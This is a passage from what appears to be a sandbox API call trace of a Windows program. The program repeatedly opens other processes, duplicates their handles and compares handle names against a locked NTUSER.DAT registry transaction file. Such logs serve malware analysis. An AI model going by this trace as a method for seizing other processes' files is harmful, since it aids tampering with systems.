_Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -5 [0153.426] CloseHandle (hObject=0x680) returned 1 [0153.427] CloseHandle (hObject=0x62c) returned 1 [0153.427] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.427] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.427] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.427] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.428] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.428] CloseHandle (hObject=0x670) returned 1 [0153.428] CloseHandle (hObject=0x680) returned 1 [0153.428] CloseHandle (hObject=0x62c) returned 1 [0153.428] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.428] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x12c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.428] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.429] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.430] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.430] CloseHandle (hObject=0x670) returned 1 [0153.430] CloseHandle (hObject=0x680) returned 1 [0153.430] CloseHandle (hObject=0x62c) returned 1 [0153.430] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.430] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x130, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.430] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.430] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.431] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.431] CloseHandle (hObject=0x670) returned 1 [0153.431] CloseHandle (hObject=0x680) returned 1 [0153.431] CloseHandle (hObject=0x62c) returned 1 [0153.431] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.431] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x134, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.431] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.432] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.433] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.433] CloseHandle (hObject=0x670) returned 1 [0153.433] _wcsicmp (_Str1="\\CatalogChangeListener-178-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.433] CloseHandle (hObject=0x680) returned 1 [0153.433] CloseHandle (hObject=0x62c) returned 1 [0153.433] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.433] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x14c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.433] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.434] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.434] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.434] CloseHandle (hObject=0x670) returned 1 [0153.434] CloseHandle (hObject=0x680) returned 1 [0153.435] CloseHandle (hObject=0x62c) returned 1 [0153.435] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x178) returned 0x62c [0153.435] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x150, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.435] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.435] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.436] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.436] CloseHandle (hObject=0x670) returned 1 [0153.436] CloseHandle (hObject=0x680) returned 1 [0153.436] CloseHandle (hObject=0x62c) returned 1 [0153.436] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0153.436] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.436] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.437] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.438] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.438] CloseHandle (hObject=0x670) returned 1 [0153.438] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.438] CloseHandle (hObject=0x680) returned 1 [0153.438] CloseHandle (hObject=0x62c) returned 1 [0153.438] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0153.438] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.438] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.439] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.440] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.440] CloseHandle (hObject=0x670) returned 1 [0153.440] CloseHandle (hObject=0x680) returned 1 [0153.440] CloseHandle (hObject=0x62c) returned 1 [0153.440] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0153.440] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xb8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.440] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.441] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.441] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.442] CloseHandle (hObject=0x670) returned 1 [0153.442] CloseHandle (hObject=0x680) returned 1 [0153.442] CloseHandle (hObject=0x62c) returned 1 [0153.442] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0153.442] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.442] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.443] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.443] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.443] CloseHandle (hObject=0x670) returned 1 [0153.443] CloseHandle (hObject=0x680) returned 1 [0153.443] CloseHandle (hObject=0x62c) returned 1 [0153.443] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0153.443] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.443] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.444] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.445] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.445] CloseHandle (hObject=0x670) returned 1 [0153.445] CloseHandle (hObject=0x680) returned 1 [0153.445] CloseHandle (hObject=0x62c) returned 1 [0153.445] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x184) returned 0x62c [0153.445] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xe8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.445] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.446] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.447] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.447] CloseHandle (hObject=0x670) returned 1 [0153.447] CloseHandle (hObject=0x680) returned 1 [0153.447] CloseHandle (hObject=0x62c) returned 1 [0153.448] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0153.448] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.448] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.448] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.449] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.449] CloseHandle (hObject=0x670) returned 1 [0153.449] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.449] CloseHandle (hObject=0x680) returned 1 [0153.449] CloseHandle (hObject=0x62c) returned 1 [0153.449] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1ac) returned 0x62c [0153.449] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x154, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.449] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.450] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.450] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.450] CloseHandle (hObject=0x670) returned 1 [0153.450] CloseHandle (hObject=0x680) returned 1 [0153.450] CloseHandle (hObject=0x62c) returned 1 [0153.450] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.451] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.451] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.451] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.452] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.452] CloseHandle (hObject=0x670) returned 1 [0153.452] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.452] CloseHandle (hObject=0x680) returned 1 [0153.452] CloseHandle (hObject=0x62c) returned 1 [0153.452] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.452] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.452] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.453] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.453] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.454] CloseHandle (hObject=0x670) returned 1 [0153.454] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.454] CloseHandle (hObject=0x680) returned 1 [0153.454] CloseHandle (hObject=0x62c) returned 1 [0153.454] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.454] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.454] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.455] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.455] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.455] CloseHandle (hObject=0x670) returned 1 [0153.455] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.455] CloseHandle (hObject=0x680) returned 1 [0153.455] CloseHandle (hObject=0x62c) returned 1 [0153.455] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.455] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.456] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.457] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.457] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.458] CloseHandle (hObject=0x670) returned 1 [0153.458] _wcsicmp (_Str1="\\ntsvcs", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -2 [0153.458] CloseHandle (hObject=0x680) returned 1 [0153.458] CloseHandle (hObject=0x62c) returned 1 [0153.458] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.458] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0xf8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.458] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.458] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.459] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.459] CloseHandle (hObject=0x670) returned 1 [0153.459] CloseHandle (hObject=0x680) returned 1 [0153.459] CloseHandle (hObject=0x62c) returned 1 [0153.459] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.459] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x104, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.459] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.460] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.460] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.461] CloseHandle (hObject=0x670) returned 1 [0153.461] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.461] CloseHandle (hObject=0x680) returned 1 [0153.461] CloseHandle (hObject=0x62c) returned 1 [0153.461] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.461] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x108, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.461] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.462] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.462] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.462] CloseHandle (hObject=0x670) returned 1 [0153.462] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.462] CloseHandle (hObject=0x680) returned 1 [0153.462] CloseHandle (hObject=0x62c) returned 1 [0153.463] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.463] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x10c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.463] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.463] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.464] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.464] CloseHandle (hObject=0x670) returned 1 [0153.464] _wcsicmp (_Str1="\\scerpc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned 5 [0153.464] CloseHandle (hObject=0x680) returned 1 [0153.464] CloseHandle (hObject=0x62c) returned 1 [0153.464] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.464] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.464] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.465] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.465] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.465] CloseHandle (hObject=0x670) returned 1 [0153.465] CloseHandle (hObject=0x680) returned 1 [0153.466] CloseHandle (hObject=0x62c) returned 1 [0153.466] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.466] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.466] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.466] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.467] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.467] CloseHandle (hObject=0x670) returned 1 [0153.467] CloseHandle (hObject=0x680) returned 1 [0153.467] CloseHandle (hObject=0x62c) returned 1 [0153.467] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.467] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.467] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.468] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.468] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.469] CloseHandle (hObject=0x670) returned 1 [0153.469] _wcsicmp (_Str1="\\CatalogChangeListener-1d8-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TMContainer00000000000000000001.regtrans-ms") returned -11 [0153.469] CloseHandle (hObject=0x680) returned 1 [0153.469] CloseHandle (hObject=0x62c) returned 1 [0153.469] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.469] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2e8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.469] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.469] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.470] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.470] CloseHandle (hObject=0x670) returned 1 [0153.470] CloseHandle (hObject=0x680) returned 1 [0153.470] CloseHandle (hObject=0x62c) returned 1 [0153.470] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.470] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x2ec, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.470] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x670 [0153.471] WaitForSingleObject (hHandle=0x670, dwMilliseconds=0xfa) returned 0x0 [0153.472] GetExitCodeThread (in: hThread=0x670, lpExitCode=0x3fed80 | out: lpExitCode=0x3fed80) returned 1 [0153.472] CloseHandle (hObject=0x670) returned 1 [0153.472] CloseHandle (hObject=0x680) returned 1 [0153.472] CloseHandle (hObject=0x62c) returned 1 [0153.472] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x1d8) returned 0x62c [0153.472] DuplicateHandle (in: hSourceProcessHandle=0x62c, hSourceHandle=0x33c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x3fedc8, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x3fedc8*=0x680) returned 1 [0153.472] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xf45650, lpParameter=0x3fed78, 